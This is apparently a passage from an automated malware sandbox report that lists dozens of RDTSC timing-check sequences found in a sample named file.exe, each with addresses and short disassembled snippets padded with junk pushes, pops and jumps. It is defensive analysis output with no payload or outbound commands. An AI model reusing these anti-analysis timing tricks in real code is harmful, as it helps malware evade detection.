Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAE23D second address: EAE260 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF8h 0x00000007 push eax 0x00000008 je 00007FDE71263CE6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAE4F6 second address: EAE4FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAE4FC second address: EAE500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAE7B7 second address: EAE7BF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB29F2 second address: EB29FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FDE71263CE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB29FC second address: EB2A21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D5h 0x00000007 jp 00007FDE70D000C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB2A21 second address: EB2A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB2CE7 second address: EB2D41 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FDE70D000D8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jno 00007FDE70D000C6h 0x00000012 push eax 0x00000013 pop eax 0x00000014 jmp 00007FDE70D000CAh 0x00000019 js 00007FDE70D000C6h 0x0000001f popad 0x00000020 pop esi 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FDE70D000D3h 0x00000028 jmp 00007FDE70D000CCh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB2FF1 second address: EB3007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FDE71263CEEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB3007 second address: EB300C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB300C second address: EB3023 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE71263CF1h 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB3188 second address: EB318C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB318C second address: EB3192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB3192 second address: EB31A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007FDE70D000C6h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB31A5 second address: EB31AB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB3302 second address: EB3306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBDB76 second address: EBDB82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FDE71263CE6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBDB82 second address: EBDB86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBDB86 second address: EBDB96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FDE71263CE6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBDB96 second address: EBDBB3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007FDE70D000E9h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FDE70D000CDh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBDBB3 second address: EBDBC2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDE71263CE6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBDFDC second address: EBDFE8 instructions: 0x00000000 rdtsc 0x00000002 js 00007FDE70D000C6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBDFE8 second address: EBDFF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jo 00007FDE71263CE6h 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBE315 second address: EBE335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE70D000CDh 0x00000009 pop eax 0x0000000a jl 00007FDE70D000D2h 0x00000010 je 00007FDE70D000C6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBE335 second address: EBE351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FDE71263CF4h 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBE351 second address: EBE355 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBE631 second address: EBE637 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBE637 second address: EBE64F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBE79A second address: EBE79E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBE79E second address: EBE7DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D8h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push ebx 0x0000000d jmp 00007FDE70D000D5h 0x00000012 jc 00007FDE70D000D2h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBE7DB second address: EBE7E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBE930 second address: EBE937 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBE937 second address: EBE946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jno 00007FDE71263CE6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBEA6D second address: EBEA84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 jg 00007FDE70D000C6h 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBF977 second address: EBF9A6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDE71263CFFh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e je 00007FDE71263CE6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBF9A6 second address: EBF9D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FDE70D000D9h 0x0000000c jmp 00007FDE70D000CEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBF9D4 second address: EBF9DE instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDE71263CE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC2B83 second address: EC2B96 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 jno 00007FDE70D000C6h 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC4E35 second address: EC4E3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC4E3D second address: EC4E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC4E43 second address: EC4E58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007FDE71263CECh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC97CC second address: EC97E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FDE70D000C6h 0x00000012 je 00007FDE70D000C6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC97E4 second address: EC97E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC97E8 second address: EC97EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC97EE second address: EC97F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED3548 second address: ED354E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED354E second address: ED3579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 jmp 00007FDE71263CF3h 0x0000000c jmp 00007FDE71263CEDh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED3579 second address: ED358B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE70D000CEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED6823 second address: ED6829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED9350 second address: ED9356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED9356 second address: ED9361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED9361 second address: ED936E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007FDE70D000C6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED936E second address: ED9376 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED8D7F second address: ED8D89 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDE70D000C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED8D89 second address: ED8D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FDE71263CECh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED8F0B second address: ED8F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FDE70D000C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDB156 second address: EDB15A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDB15A second address: EDB16A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000CCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDB16A second address: EDB170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDB170 second address: EDB1BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D1h 0x00000007 pushad 0x00000008 jnp 00007FDE70D000C6h 0x0000000e jnc 00007FDE70D000C6h 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007FDE70D000D0h 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 jo 00007FDE70D000C6h 0x00000027 jmp 00007FDE70D000CDh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDB1BB second address: EDB1FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FDE71263CF3h 0x0000000e jo 00007FDE71263CF8h 0x00000014 jmp 00007FDE71263CECh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEA412 second address: EEA423 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000CBh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEF7C3 second address: EEF7C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEF7C7 second address: EEF7CD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEF641 second address: EEF645 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF6B6A second address: EF6B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF6B6E second address: EF6B7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jng 00007FDE71263CE6h 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF6B7C second address: EF6B87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FDE70D000C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF53C4 second address: EF53CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF53CC second address: EF53D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF5550 second address: EF556C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CEAh 0x00000007 jng 00007FDE71263CE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007FDE71263CE6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF556C second address: EF5572 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF5572 second address: EF5582 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jnc 00007FDE71263CE6h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF56EF second address: EF56FD instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDE70D000C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF56FD second address: EF5701 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF58A8 second address: EF58C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FDE70D000D7h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF58C4 second address: EF58D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FDE71263CE6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF58D3 second address: EF58D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF5A38 second address: EF5A3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF5A3E second address: EF5A4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007FDE70D000C6h 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF5A4D second address: EF5A51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF5A51 second address: EF5A57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF5A57 second address: EF5AAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CEBh 0x00000007 jg 00007FDE71263CF9h 0x0000000d jmp 00007FDE71263CF1h 0x00000012 pushad 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FDE71263CEEh 0x0000001f jmp 00007FDE71263CF9h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF5AAA second address: EF5ABA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000CAh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF68AC second address: EF68C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E00A62 second address: E00A79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FDE70D000D1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFCA69 second address: EFCA6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFCA6F second address: EFCA73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F098A1 second address: F098A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F18F29 second address: F18F2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F18F2F second address: F18F35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F18F35 second address: F18F3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F18F3D second address: F18F41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F18F41 second address: F18F45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F18DC8 second address: F18DCD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1B737 second address: F1B73D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1B73D second address: F1B743 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F336AC second address: F336B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F33ADE second address: F33AE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F33AE2 second address: F33AE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F33DCA second address: F33DD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F33DD6 second address: F33DEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDE70D000CEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F34105 second address: F34122 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE71263CF9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F35D0E second address: F35D12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
